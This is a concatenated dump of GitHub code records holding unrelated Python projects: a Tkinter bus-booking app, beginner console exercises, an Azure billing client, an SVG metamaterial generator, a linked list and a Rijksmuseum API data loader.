l2=Label(add_root, text=\"Bus Type\").grid()\r\n e2=OptionMenu(add_root, V, *choice)\r\n e2.grid(row=10,column=1)\r\n l3=Label(add_root,text=\"From Where\").grid()\r\n e3=Entry(add_root)\r\n e3.grid(row=11,column=1)\r\n l4=Label(add_root,text=\"To Where\").grid()\r\n e4=Entry(add_root)\r\n e4.grid(row=12,column=1)\r\n l5=Label(add_root,text=\"Date\").grid()\r\n e5=Entry(add_root)\r\n e5.grid(row=13,column=1)\r\n l6=Label(add_root,text=\"Arrival Time\").grid()\r\n e6=Entry(add_root)\r\n e6.grid(row=14,column=1)\r\n l6=Label(add_root,text=\"Departure Time\").grid()\r\n e7=Entry(add_root)\r\n e7.grid(row=15,column=1)\r\n l7=Label(add_root,text=\"Fare\").grid()\r\n e8=Entry(add_root)\r\n e8.grid(row=16,column=1)\r\n l7=Label(add_root,text=\"Seats\").grid()\r\n e9=Entry(add_root)\r\n e9.grid(row=17,column=1)\r\n def Save():\r\n conn = sqlite3.connect('Database.db')\r\n c = conn.cursor()\r\n values =(e1.get(),V.get(),e3.get(),e4.get(),e5.get(),e6.get(),e7.get(),e8.get(),e9.get())\r\n c.execute(\"\"\"INSERT INTO BUS(OPERATOR,BUS_TYPE,D_FROM,A_TO ,DATE,DEP_TIME ,ARR_TIME ,FARE ,SEATS)\r\n VALUES(?,?,?,?,?,?,?,?,?)\"\"\", values)\r\n values =(e1.get(),V.get(),e3.get(),e4.get(),e5.get(),e6.get(),e7.get(),e8.get(),e9.get())\r\n conn.commit()\r\n row = c.fetchall()\r\n print(row)\r\n conn.close()\r\n add_root.destroy()\r\n messagebox.showinfo(\"DATA\", \"DATA SAVED\")\r\n\r\n b2=Button(add_root,text=\"Save\",command=Save).grid(row=18,column=1)\r\n \r\n\r\n Heading=Label(add_root,text=\"Bus Operator Detail Filling\" ,font='Times 30 bold').grid(padx=100,pady=10,columnspan=2)\r\n l1=Label(add_root,text=\"Full Name\").grid(row=5)\r\n e1=Entry(add_root)\r\n e1.grid(row=5,column=1)\r\n l2=Label(add_root,text=\"Contact Number\").grid()\r\n e2=Entry(add_root)\r\n e2.grid(row=6,column=1)\r\n l3=Label(add_root,text=\"Address\").grid()\r\n e3=Entry(add_root)\r\n e3.grid(row=7,column=1)\r\n def check():\r\n if(e1.get()==\"\" or e2.get()==\"\" or e3.get==\"\"):\r\n add_root.destroy()\r\n messagebox.showinfo(\"error\",\"Insert values\")\r\n else:\r\n detail()\r\n b1=Button(add_root,text=\"Add Details\",command=check).grid(row=8,column=1)\r\n \r\n \r\n add_root.mainloop()\r\n\r\ndef search_bus():\r\n search_root = Tk()\r\n search_root.geometry(\"1000x1000\")\r\n search_root_label = Label(search_root, text=\"BUS BOOKING SERVICE\", fg=\"blue\",font=\"Times 50 bold\", relief=\"raised\")\r\n search_root_label.grid(padx=100,pady=30,columnspan=2)\r\n Heading=Label(search_root,text=\"Bus Details\" ,font='Times 30 bold').grid(padx=100,pady=10,columnspan=2)\r\n\r\n V=StringVar(search_root)\r\n V.set(\"All Types\")\r\n choice=['A/C','Non-A/C','A/C Sleeper','Non-A/C Sleeper','All Types']\r\n\r\n l1=Label(search_root, text=\"Type of Bus\").grid(row=5,column=0)\r\n OptionMenu(search_root, V, *choice).grid(row=5,column=1)\r\n l2 = Label(search_root, text=\"From Where\").grid(row=6,column=0)\r\n e1 = Entry(search_root)\r\n e1.grid(row=6,column=1)\r\n l3 = Label(search_root, text=\"Where to\").grid(row=7,column=0)\r\n e2= Entry(search_root)\r\n e2.grid(row=7,column=1)\r\n l4= Label(search_root, text=\"Date\").grid(row=8,column=0)\r\n e3= Entry(search_root)\r\n e3.grid(row=8,column=1)\r\n def bookingScreen():\r\n bookingScreen_root = Tk()\r\n bookingScreen_root.geometry(\"1000x1000\")\r\n H1 = Label(bookingScreen_root, text=\"BUS BOOKING SERVICE\", fg=\"blue\",font=\"Times 50 bold\", relief=\"raised\")\r\n H1.grid(padx=100,pady=30,columnspan=11)\r\n H2=Label(bookingScreen_root,text=\"Booking Screen\" ,font='Times 30 bold').grid(padx=100,pady=10,columnspan=11)\r\n aa=e1.get()\r\n bb=e2.get()\r\n cc=V.get()\r\n conn = sqlite3.connect('Database.db')\r\n c = conn.cursor()\r\n c.execute(\"SELECT * FROM BUS WHERE D_FROM= ? AND A_TO = ? AND BUS_TYPE = ?\",(aa,bb,cc))\r\n conn.commit()\r\n ro=c.fetchall()\r\n l=int(0)\r\n w=int(3)\r\n for i in ro:\r\n l=int(0)\r\n for j in i:\r\n qwerty=Label(bookingScreen_root,text=j , bg=\"yellow\")\r\n qwerty.grid(column=l,row=w,padx=4) \r\n l=l+1\r\n w=w+1\r\n \r\n print(ro)\r\n conn.close()\r\n l1=Label(bookingScreen_root, text=\"Operator\").grid(row=2,column=0)\r\n l2=Label(bookingScreen_root, text=\"Type\").grid(row=2,column=1)\r\n l3=Label(bookingScreen_root, text=\"From\").grid(row=2,column=2)\r\n l4=Label(bookingScreen_root, text=\"To\").grid(row=2,column=3)\r\n l5=Label(bookingScreen_root, text=\"Date\").grid(row=2,column=4)\r\n l6=Label(bookingScreen_root, text=\"Dept Time\").grid(row=2,column=5)\r\n l7=Label(bookingScreen_root, text=\"Arr Time\").grid(row=2,column=6)\r\n l8=Label(bookingScreen_root, text=\"Fare\").grid(row=2,column=7)\r\n l9=Label(bookingScreen_root, text=\"Seats Availability\").grid(row=2,column=8)\r\n \r\n \r\n def quit_booking():\r\n bookingScreen_root.destroy()\r\n \r\n HomeButton = Button(bookingScreen_root, text=\"Home\", command=quit_booking).grid(columnspan=11,padx=100,pady=100)\r\n bookingScreen_root.mainloop()\r\n\r\n def check():\r\n if(e1.get()==\"\" or e2.get()==\"\" or e3.get==\"\"):\r\n search_root.destroy()\r\n messagebox.showinfo(\"error\",\"Insert values\")\r\n else:\r\n bookingScreen()\r\n\r\n Button1 = Button(search_root, text=\"Find Buses\", command=check).grid(column=1)\r\n def quit_search():\r\n search_root.destroy()\r\n HomeButton = Button(search_root, text=\"Home\",fg=\"red\", command=quit_search,padx=10,pady=10).grid(columnspan=2,padx=20,pady=20)\r\n \r\n search_root.mainloop()\r\n\r\nadd_button = Button(root, text=\"Add Bus\", width=15, height=5, command=add_bus).grid(column=0,row=3)\r\nsearch_button = Button(root, text=\"Search Bus\", width=15, height=5, command=search_bus).grid(column=2,row=3)\r\n\r\nroot.mainloop()","repo_name":"devYRPauli/Bus-Booking-Application","sub_path":"busbooking.py","file_name":"busbooking.py","file_ext":"py","file_size_in_byte":8061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8524100220","text":"# print(\"Консольная игра 'Угадай число'\")\n# import random\n# min = int(input(\"Введите начальный диапазон: \"))\n# max = int(input (\"Введите конечный диапазон: \"))\n\n# random_number = random.randint(min, max)\n# attempts = 0\n# print (\"Мы сгенерировали случайное число в указанном вами диапазоне! Попробуйте его угадать!\")\n\n\n# while True:\n# response = int(input(\"Введите число: \"))\n# attempts += 1\n# if response < random_number:\n# print (\"Случайное число больше, попробуйте снова\")\n# elif response > random_number:\n# print (\"Случайное число меньше, попробуйте снова\")\n# else: \n# print (f'Ура! Вы угдали загаданное число за {attempts} попыток.')\n# break\n\n\n# print (\"Конвертер валют\")\n# choose = {\n# \"KGS\": 1,\n# \"USD\": 2,\n# \"RUB\": 3,\n# \"JPY\": 4\n# }\n# for key, value in choose.items():\n# print(value, key)\n# convert_from = int(input(\"Выберите номер валюты из выше перечисленных С котрой нужно перевести: \"))\n# convert_to = int(input(\"Выберите валюту НА которую нужно перевести: \"))\n# amount = float(input(\"Введите сумму: \"))\n\n# exchange = {\n# \"KGS\": 1,\n# \"USD\": 88.25,\n# \"RUB\": 0.92, \n# \"JPY\": 0.61\n# }\n\n# def converter(convert_to, amount):\n# try:\n# if convert_to not in choose.values():\n# raise \"Неверный номер валюты\"\n# if convert_to == 1:\n# print(f'{amount}KGS = {amount/exchange[\"KGS\"]} KGS') \n# elif convert_to == 2:\n# print(f'{amount}KGS = {amount/exchange[\"USD\"]:.2f} USD') \n# elif convert_to == 3:\n# print(f'{amount}KGS = {amount/exchange[\"RUB\"]:.2f} RUB') \n# elif convert_to == 4:\n# print(f'{amount}KGS = {amount/exchange[\"JPY\"]:.2f} JPY') \n# except Exception:\n# print (\"Убедитесь, что выбрали номер валюты из вышеперечисленного\")\n \n# converter(convert_to, amount)\n\n\n\n\nfrom income import add_income, delete_income\nfrom expense import add_expense, delete_expense\nfrom show import display_statistics, view_transitions\nwhile True:\n choose_functions = {\n 1: \"Добавление дохода\",\n 2: \"Добавление расхода\",\n 3: \"Удаление транзакции: Доход \",\n 4: \"Удаление транзакции: Расход \",\n 5: \"Просмотр списка транзакций\",\n 6: \"Анализ и отображение статистики\"\n }\n for key, value in choose_functions.items():\n print(key, value)\n \n action = int(input(\"Выберите действие: \")) \n \n if action == 1:\n add_income()\n elif action == 2:\n add_expense()\n elif action == 3:\n delete_income()\n elif action == 4:\n delete_expense()\n elif action == 5:\n view_transitions()\n elif action == 6:\n display_statistics()\n else:\n print(\"Убедитесь, что выбрали число из вышеуказанных\")\n","repo_name":"Pipinvel/python","sub_path":"first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37735391261","text":"from datetime import datetime\r\n\r\nimport requests\r\nfrom pandas import DataFrame\r\n\r\n\r\nclass AzureEA:\r\n def __init__(self, enrollment_number, access_key):\r\n self.base_url = (\r\n f\"https://consumption.azure.com/v3/enrollments/{enrollment_number}\"\r\n )\r\n self.header = {\"Authorization\": f\"Bearer {access_key}\"}\r\n\r\n def get_total_usage(self):\r\n\r\n uri = f\"{self.base_url}/balancesummary\"\r\n response = requests.get(url=uri, headers=self.header).json()\r\n return response[0][\"totalUsage\"]\r\n\r\n def get_period_usage(self, period=None):\r\n\r\n if not period:\r\n period = datetime.now().strftime(\"%Y%m\")\r\n uri = f\"{self.base_url}/billingPeriods/{period}/usagedetails\"\r\n response = requests.get(url=uri, headers=self.header).json()\r\n df = DataFrame(response[\"data\"])\r\n\r\n while response[\"nextLink\"] is not None:\r\n response = requests.get(\r\n url=response[\"nextLink\"], headers=self.header\r\n ).json()\r\n df = df.append(response[\"data\"], ignore_index=True)\r\n\r\n df = df.reindex(\r\n [\"serviceName\", \"subscriptionName\", \"meterName\", \"cost\"], axis=1\r\n )\r\n\r\n groups = df.groupby([\"serviceName\", \"subscriptionName\", \"meterName\"]).sum()\r\n\r\n return groups\r\n","repo_name":"positivenoise/azure-billing-prometheus-exporter","sub_path":"app/azure_ea.py","file_name":"azure_ea.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40925357413","text":"from cmath import sqrt\nfrom svgpathtools import Path, Line, Arc, bbox2path, parse_path, wsvg\nfrom datetime import date\n\n\nclass Generator:\n \"\"\"\n CREATE a metamaterial SVG\n \"\"\"\n\n def __init__(self, output=\"output\"):\n \"\"\"Stores parameters for the zigzag height and width and sets up the dictionary of shapes\"\"\"\n # an array of all the shapes that have been created\n self.shapes = {}\n # an array of shapes that have been filled. These should be\n # automatically updated when something is changed in self.shapes\n self.filled_shapes = {}\n\n # zigzag fill only\n # the width of the short zigzag\n self.short_zigzag_width = 12\n # the height of both zigzags is the same\n self.zigzag_height = 18\n # the width of the long zigzag\n self.long_zigzag_width = 24\n\n # lozenge grid infill only\n self.loz_long_side = 42.5/5\n self.loz_short_side = 29/5 \n self.loz_gap = 13.5/5 \n self.loz_spacing = self.loz_long_side + self.loz_short_side + self.loz_gap\n\n # the default output directory\n self.output_dir = output\n\n # the default name for a shape\n self.default_shape_name = 'rect'\n # the default fill style\n self.default_fill_name = 'zigzag'\n\n self.print_list = [\"fill_shape_lozenge\"]\n\n def fill_shape(self, shape_name=\"default\", rotation=0, border=True, filltype=\"default\", position=[0,0]):\n \"\"\" Files a shape with the type described in filltype\"\"\"\n\n name = self.default_shape_name if (\n shape_name == \"default\") else shape_name\n my_fill = self.default_fill_name if (\n filltype == \"default\") else filltype\n\n # find bounding box of shape to be filled\n shape_path = self.shapes[name]\n bbx = shape_path.bbox()\n # find longest side of bounding box\n xlength = bbx[1] - bbx[0]\n ylength = int(bbx[3] - bbx[2])\n diagonal = sqrt(xlength * xlength + ylength * ylength).real + 0.2\n self.print(\"fill_shape\", diagonal)\n\n # diagonal/2 is the center of the rectangle;\n # bbx[0]+xlength/2 is the center of the shape\n # subtract to figure out how much to translate\n x_translate = (bbx[0] + xlength / 2) - diagonal / 2\n y_translate = 1j * ((bbx[2] + ylength / 2) - diagonal / 2)\n\n if (my_fill == 'zigzag'):\n # fill a rectangle that is as large as the bounding box\n rect = self.make_zigzag_rectangle(diagonal, diagonal)\n else:\n # fill a rectangle that is as large as the bounding box\n rect = self.make_loz_rectangle(diagonal, diagonal)\n\n rotated_rect = []\n for path in rect:\n if (rotation > 0):\n path = path.rotated(\n rotation, diagonal / 2 + 1j * diagonal / 2)\n # calculate the amount to translate in x as the upper left corner\n # of this path minus the upper left corner of the shape's bounding box\n path = path.translated(x_translate + y_translate)\n rotated_rect.append(path)\n\n self.print(\"fill_shape\",\"cropping \")\n # call crop to shape\n cropped_shape = self.crop_to_shape(shape_path, rotated_rect)\n \n self.print(\"fill_shape\",\"adding border\")\n # add border if needed\n if border:\n cropped_shape.append(shape_path)\n\n self.print(\"fill_shape\", \"translating shape\")\n\n translated_shape = []\n for path in cropped_shape:\n path = path.translated(position[0]+position[1]*1j)\n translated_shape.append(path)\n \n # save in filled_shapes\n self.filled_shapes[name] = translated_shape\n\n################### ZIGZAG HELPER CODE #####################\n def make_zigzag_column(self, zigzag_width, zigzag_height, total_length, start_x, start_y):\n \"\"\"generates a column of zigzags(with given width and height) at a specific coordinate(start_x, start_y) of a certain length(total_length)\"\"\"\n path = Path()\n x = start_x\n y = start_y\n x_end = start_x + zigzag_width\n num_repeats = int(total_length/zigzag_height + 1)\n for i in range(num_repeats):\n path.append(Line(x + y*1j, x_end+(y+zigzag_height/2)*1j))\n path.append(Line(x_end + (y+zigzag_height/2)\n * 1j, x + (y+zigzag_height)*1j))\n y = y+zigzag_height\n return path\n\n def make_zigzag_rectangle(self, rectangle_width, rectangle_height):\n \"\"\"makes a rectangle out of small and large zigzag columns at 0, 0 that is the given size. basically generates the base auxetic material pattern\"\"\"\n\n num_repeats = int(\n rectangle_width/(self.long_zigzag_width - self.short_zigzag_width) + 1)\n rectangle_of_zigzags = []\n start_x = 0\n y = 0\n for i in range(num_repeats):\n rectangle_of_zigzags.append(self.make_zigzag_column(\n self.short_zigzag_width, self.zigzag_height, rectangle_height, start_x, y))\n start_x = start_x\n rectangle_of_zigzags.append(self.make_zigzag_column(\n self.long_zigzag_width, self.zigzag_height, rectangle_height, start_x, y))\n start_x = start_x+self.long_zigzag_width-self.short_zigzag_width\n return rectangle_of_zigzags\n\n ################### LOZENGE HELPER CODE #####################\n \n def make_loz_line(self, total_length, start_x, start_y, direction=\"row\", flip=False):\n \"\"\" Makes one of four possible lines: a row, a flipped row, a column, or a flipped column. \n direction spefies row or column. \"\"\"\n path = Path()\n\n # Calculates number of repeats within a line\n num_repeats = int(total_length/(2*self.loz_long_side)+1) \n self.print(\"make_loz_line\",f\"creating {direction} at ({start_x}, {start_y}) that is {flip} with {num_repeats} repeated per line of length {total_length}\")\n \n # unflipped row start\n unflipped_row_start = [start_x, start_y] # start at start_x, start_y\n # flipped row start\n flipped_row_start = [start_x, start_y+self.loz_short_side]\n # unflipped col start\n unflipped_col_start = [start_x-1.5, start_y+7] # where did these numbers come from\n # flipped col start\n flipped_col_start = [start_x-1.5, start_y+7] # where did these numbers come from\n\n # when to apply changes to x, and when to apply them to y\n row_order = [[1,0],[0,1],[1,0],[0,1],[1,0]]\n col_order = [[0,1],[1,0],[0,1],[1,0],[0,1]]\n \n increase_first = [self.loz_long_side/2,\n self.loz_short_side, # increase \n self.loz_long_side,\n -self.loz_short_side, # decrease\n self.loz_long_side/2]\n decrease_first = [self.loz_long_side/2,\n -self.loz_short_side, # decrease\n self.loz_long_side,\n self.loz_short_side, # increase\n self.loz_long_side/2]\n\n if (direction == \"row\"): \n cursor = flipped_row_start if flip else unflipped_row_start\n changes = decrease_first if flip else increase_first\n order = row_order\n else:\n cursor = flipped_col_start if flip else unflipped_col_start\n changes = increase_first if flip else decrease_first\n order = col_order\n \n # turn that information into a list of x and y changes\n # in the format [[x1, y1],[x2, y2],[x3, y3]...]\n change_list = list(map(lambda change, item: \n list(map(lambda val: change*val, item)),\n changes,\n order))\n \n self.print(\"make_loz_line\",change_list)\n\n # repeatedly execute the changes until num_repeats\n for i in range(num_repeats):\n for change in change_list:\n self.print(\"make_loz_line\", cursor)\n path.append(Line(cursor[0]+cursor[1]*1j,\n (cursor[0]+change[0])+(cursor[1]+change[1])*1j))\n cursor[0] = cursor[0]+change[0]\n cursor[1] = cursor[1]+change[1]\n return path\n \n def make_loz_rectangle(self, rectangle_width, rectangle_height):\n \"\"\" Makes a rectangle of width, height and fills it with a lozenge grid. loz_orizontal_len is the length of a single lozenge on the horizental lines. loz_short_side. loz_spacing is the distance between things that are the same \"\"\"\n\n # Calculate number of repeats across the whole rectangle\n num_repeats_y = int(2+rectangle_width/self.loz_spacing)\n num_repeats_x = int(2+rectangle_height/self.loz_spacing)\n\n self.print(\"make_loz_rectangle\",f\"making rectangle with width {rectangle_width}, height {rectangle_height} with {num_repeats_y} horizontal and {num_repeats_x} vertical lines \")\n \n \n return_rect = []\n start_x = 0 # increments by\n start_y = 0\n start_y_flipped = 0 + self.loz_short_side + self.loz_gap\n start_x_column = 0\n start_y_column = 0\n start_x_column_flipped = 0 + self.loz_gap\n\n for i in range(num_repeats_y):\n self.print(\"make_loz_rectangle\",f\"{i} rows\")\n return_rect.append(self.make_loz_line(rectangle_width, start_x, start_y))\n return_rect.append(self.make_loz_line(rectangle_width, start_x, start_y_flipped, flip=True))\n start_y = start_y + self.loz_spacing\n start_y_flipped = start_y_flipped + self.loz_spacing\n for i in range(num_repeats_x):\n self.print(\"make_loz_rectangle\",f\"{i} columns\")\n return_rect.append(self.make_loz_line(rectangle_height, start_x_column, start_y_column,\n direction=\"column\"))\n return_rect.append(self.make_loz_line(rectangle_height, start_x_column_flipped, start_y_column,\n direction=\"column\", flip=True))\n start_x_column = start_x_column + self.loz_spacing\n start_x_column_flipped = start_x_column_flipped + self.loz_spacing\n start_x = start_x+self.loz_spacing\n\n return return_rect\n\n ############################# OTHER HELPERS #############################\n\n def crop_to_shape(self, shape_path, rectangle_paths):\n \"\"\"crops a given shape(path outline) to a filled rectangle.\"\"\"\n cropped_paths = []\n\n xmin, xmax, ymin, ymax = shape_path.bbox()\n pt_outside_shape = (xmin-1) + (ymin-1)*1j\n shape_path = shape_path.translated(-0.1 - 0.1j)\n for path in rectangle_paths:\n pt = 0\n for (T1, seg1, t1), T2 in path.intersect(shape_path):\n if T1 < pt:\n cropped_paths.append(\n Line(path.point(pt), path.point(T1)))\n elif T1 == pt:\n continue\n else:\n cropped_paths.append(path.cropped(pt, T1))\n pt = T1\n final_version = []\n for path in cropped_paths:\n pt = path.point(0.5)\n crosses = Path(Line(pt, pt_outside_shape)).intersect(shape_path)\n if len(crosses) % 2:\n final_version.append(path)\n\n return final_version\n\n def offset_curve(self, path, offset_distance, steps=1000):\n \"\"\"Takes in a Path object, `path`, and a distance,\n `offset_distance`, and outputs an piecewise-linear approximation\n of the 'parallel' offset curve.\"\"\"\n offpath = f\"M \"\n nls = []\n for seg in path:\n ct = 1\n for k in range(steps):\n t = k / steps\n offset_vector = offset_distance * seg.normal(t)\n offpath += f\" {seg.point(t).real}, {seg.point(t).imag}\"\n nl = Line(seg.point(t), seg.point(t) + offset_vector)\n nls.append(nl)\n connect_the_dots = [Line(nls[k].end, nls[k+1].end)\n for k in range(len(nls)-1)]\n if path.isclosed():\n connect_the_dots.append(Line(nls[-1].end, nls[0].end))\n offpath += \" Z\"\n # offset_path = Path(*connect_the_dots)\n offset_path = parse_path(offpath)\n return offset_path\n\n def fill_offset_curve(self, shape, offset_distance, steps=1000):\n \"\"\"Takes in a Path object, `path`, and a distance,\n `offset_distance`, and outputs an piecewise-linear approximation\n of the 'parallel' offset curve.\"\"\"\n path = self.shapes[shape]\n\n offset_path = self.offset_curve(path, offset_distance, steps)\n path.append(offset_path)\n # path = Path(*offset_path, *path)\n # path = Path(path.d())\n self.shapes[shape] = path\n\n return path\n # return offset_path\n\n def print(self, name, text):\n result = print(f\"{name}: {text}\") if name in self.print_list else False\n result = print(f\"{text}: {self.shapes[name]}\") if name in self.shapes else False\n\n def make_svg(self, names, filled_names, filename, units='mm', svg_attributes=None, attributes=None):\n \"\"\"Saves a list of shapes as an svg\"\"\"\n paths = []\n for name in names:\n path = self.shapes[name]\n # self.print(path.bbox(), name)\n paths += path\n\n for name in filled_names:\n path = self.filled_shapes[name]\n # self.print(path.bbox(), name)\n paths += path\n\n filename=f\"{self.output_dir}/{filename}_zig{self.short_zigzag_width}.{self.zigzag_height}.{self.long_zigzag_width}_loz{self.loz_long_side}.{self.loz_short_side}.{self.loz_gap}_{date.today().isoformat()}.svg\"\n \n # if (len(attributes) is 0): attributes = np.full(len(names)+1, {})\n wsvg(paths=paths, filename=filename,\n baseunit=units, svg_attributes=svg_attributes, attributes=attributes)\n\n################### Setters and Getters ####################\n\n def set_default_shape_name(self, name):\n self.default_shape_name = name\n\n def set_default_fill_name(self, name):\n self.default_fill_name = name\n\n def set_print_list(self, list):\n self.print_list = list\n\n################### Shape making functions (standard graphics stuff) ####################\n\n def add_path(self, name, path):\n \"\"\" Adds a path to the dictionary. Path should be specified using a d string and is then parsed. \"\"\"\n path = parse_path(path)\n self.shapes[name] = path\n\n def add_shape(self, name, shape):\n \"\"\" Adds a shape to the dictionary, specified as a d string\"\"\"\n self.shapes[name] = shape\n\n def add_rect(self, name, w, h):\n \"\"\" Adds a rectangle to the dictionary\"\"\"\n self.add_path(name, f\"M 0 0 h {w} v {h} h {-w} Z\")\n\n def add_line(self, name, start, end):\n \"\"\" Adds a line to the dictionary \"\"\"\n self.shapes[name] = Line(start, end)\n\n def add_line(self, name, x1, y1, x2, y2):\n \"\"\" Adds a line to the dictionary \"\"\"\n self.shapes[name] = Line(x1+1j*y1, x2+1j*y2)\n\n def add_circle(self, name, radius):\n \"\"\" Adds a circle to the dictionary\"\"\"\n circle = Path(Arc(start=0 + 120j, rotation=0, radius=radius, large_arc=1, sweep=180, end=200 + 120j),\n Arc(start=200 + 120j, rotation=180, radius=radius, large_arc=1, sweep=180, end=0 + 120j))\n # need to tie the start and end to the radius\n self.shapes[name] = circle\n return circle\n\n def scale_shape(self, name, fraction):\n \"\"\"Scales an existing shape (or every path in a shape) to a fraction of its current size\"\"\"\n # add ability to scale differently in X and Y and to choose scale origin\n shape = self.shapes[name]\n self.shapes[name] = shape.scaled(fraction)\n\n def translate_shape(self, name, translate):\n \"\"\" Translate a shapy (or every path in a shape) by the complex coordinates given\"\"\"\n shape = self.shapes[name]\n self.shapes[name] = shape.translated(translate)\n\n def move_to_origin(self, name, topleft=True, middle=False):\n \"\"\"Moves the shape to the orgin. If topleft, move the top left of the bounding box\n to the origin, otherwise move the middle to the orgiin.\"\"\"\n bbx = self.shapes[name].bbox()\n translate = -bbx[1]-1j*bbx[2]\n\n if middle:\n xlength = bbx[1]-bbx[0]\n ylength = int(bbx[3]-bbx[2])\n translate = translate - xlength/2-1j*ylength/2\n\n self.translate_shape(name, middle)\n\n def move_new_location(self, name, xnew, ynew, middle=True):\n bbx = self.shapes[name].bbox()\n\n translate = -bbx[1]-1j*bbx[2]\n\n if middle:\n translate = translate - xnew - 1j*ynew\n\n self.translate_shape(name, middle)\n","repo_name":"make4all/meta-embroidery","sub_path":"metamaterial_generator/metamaterial_generator.py","file_name":"metamaterial_generator.py","file_ext":"py","file_size_in_byte":17091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4232622172","text":"class Node():\n def __init__(self,data = None):\n self.data = data\n self.next = None\n\nclass SingleLinkedList():\n def __init__(self):\n self.head = None\n\n def traverseList(self):\n print_val = self.head\n\n while print_val is not None:\n print(print_val.data)\n print_val = print_val.next\n\n #Update the new nodes next val to existing node\n def insert_val_At_begining (self,new_data):\n new_Node = Node(new_data)\n new_Node.next = self.head\n self.head = new_Node\n\n def insert_val_At_End(self,new_data):\n new_Node = Node(new_data)\n #If linkedList is empty,insert node at head level\n if self.head is None:\n self.head = new_Node\n return\n #decalring variable for last node in linkedlist\n laste = self.head\n while laste.next:\n laste =laste.next\n laste.next = new_Node\n\n #Inserting in between two data Nodes\n\n def in_between(self,middle_node,new_data):\n if middle_node is None:\n print(\"The mentioned node is absent\")\n return\n new_Node = Node(new_data)\n new_Node.next = middle_node.next\n middle_node.next = new_Node\n\n def remove_Node(self,remove_key):\n head_val = self.head\n\n if head_val is not None:\n if head_val.data == remove_key:\n self.head = head_val.next\n head_val = None\n return\n while head_val is not None:\n if head_val.data == remove_key:\n break\n prev = head_val\n head_val = head_val.next\n\n if head_val == None:\n return\n prev.next = head_val.next\n\n head_val = None\n\n\n\n\n\ns = SingleLinkedList()\ns.insert_val_At_begining(\"At Begining\")\ns.traverseList()\n","repo_name":"boddugopikrishna/LearningOne","sub_path":"venv/All functions/Data Structures/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9972600660","text":"import requests\nfrom model import Item, Repository, Artist, ItemLanguage, Department\nimport os\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nengine = create_engine(os.environ['DATABASE_URL'])\nSession = sessionmaker(bind=engine)\nsession = Session()\n\napikey = os.environ[\"RIJKS_KEY\"]\n\n\ndef search():\n for x in range(1, 10):\n res = requests.get(\"https://www.rijksmuseum.nl/api/en/collection?key={}&format=json&p={}&ps=100&imgonly=True&st=Objects\".format(apikey, x)).json()\n for obj in res['artObjects']:\n obj_id = obj['objectNumber']\n item = session.query(Item).filter_by(api_id=obj_id).first()\n if not item:\n loader(obj_id)\n\n\ndef loader(obj_id):\n base_url = \"https://www.rijksmuseum.nl/api/{}/collection/{}?key={}&format=json\".format(\"en\", obj_id, apikey)\n response = requests.get(base_url).json()\n nl_url = \"https://www.rijksmuseum.nl/api/{}/collection/{}?key={}&format=json\".format(\"nl\", obj_id, apikey)\n nl_response = requests.get(nl_url).json()\n artObject = response[\"artObject\"]\n artObjectPage = response[\"artObjectPage\"]\n nl_artObject = nl_response[\"artObject\"]\n nl_artObjectPage = nl_response[\"artObjectPage\"]\n repository = session.query(Repository).filter_by(name=\"Rijksmuseum\").first()\n department = None\n if artObject[\"objectCollection\"]:\n department = session.query(Department).filter_by(repository_id=repository.id, name=artObject[\"objectCollection\"][0]).first()\n if department is None:\n new_department = Department(repository_id=repository.id, name=artObject[\"objectCollection\"][0])\n session.add(new_department)\n session.commit()\n artist_name = artObject[\"principalOrFirstMaker\"]\n artist = None\n if artist_name and artist_name is not \"anonymous\":\n artist = session.query(Artist).filter_by(name=artist_name).first()\n if not artist:\n for pm in artObject[\"principalMakers\"]:\n if pm[\"name\"] == artist_name:\n birth_date = pm[\"dateOfBirth\"]\n death_date = pm[\"dateOfDeath\"]\n artist = Artist(name=artist_name, birth_date=birth_date, death_date=death_date, bio=pm[\"biography\"])\n session.add(artist)\n session.commit()\n if artist is None:\n return\n else:\n artist = session.query(Artist).filter_by(name=\"Unknown\").one()\n webImage = artObject.get(\"webImage\", {})\n primary_image = None\n if webImage and \"url\" in webImage:\n primary_image = webImage[\"url\"]\n else:\n return\n new_item_dict = {\n \"api_id\": obj_id,\n \"repository_id\": repository.id,\n \"public_domain\": artObject.get(\"isPublicDomain\", True),\n \"primary_image\": primary_image,\n \"primary_image_height\": artObject.get(\"webImage\", {}).get(\"height\"),\n \"primary_image_width\": artObject.get(\"webImage\", {}).get(\"width\"),\n \"artist_id\": artist.id,\n \"obj_date\": artObject.get(\"dating\", {}).get(\"presentingDate\"),\n }\n if department:\n new_item_dict[\"department_id\"] = department.id\n new_item = Item(**new_item_dict)\n session.add(new_item)\n session.commit()\n en_language_dict = {\n \"item_id\": new_item.id,\n \"language\": \"EN\",\n \"title\": artObject.get(\"title\"),\n \"description\": artObjectPage.get(\"plaqueDescription\"),\n \"creditLine\": artObject.get(\"acquisition\", {}).get(\"creditLine\"),\n \"medium\": artObject.get(\"physicalMedium\"),\n \"audiofile\": artObjectPage.get(\"audioFile1\")\n }\n nl_language_dict = {\n \"item_id\": new_item.id,\n \"language\": \"NL\",\n \"title\": nl_artObject.get(\"title\"),\n \"description\": nl_artObject.get(\"description\"),\n \"creditLine\": nl_artObject.get(\"acquisition\", {}).get(\"creditLine\"),\n \"medium\": nl_artObject.get(\"physicalMedium\"),\n \"audiofile\": nl_artObjectPage.get(\"audioFile1\")\n }\n en_il = ItemLanguage(**en_language_dict)\n nl_il = ItemLanguage(**nl_language_dict)\n session.add(en_il)\n session.add(nl_il)\n session.commit()\n print(en_il.title)\n\nsearch()\n","repo_name":"dimdog/docent-backend","sub_path":"rijks_loader.py","file_name":"rijks_loader.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38754443958","text":"from pathlib import Path\nfrom pyspark.sql import SparkSession, Column, DataFrame\nfrom pyspark.sql.functions import col\nfrom 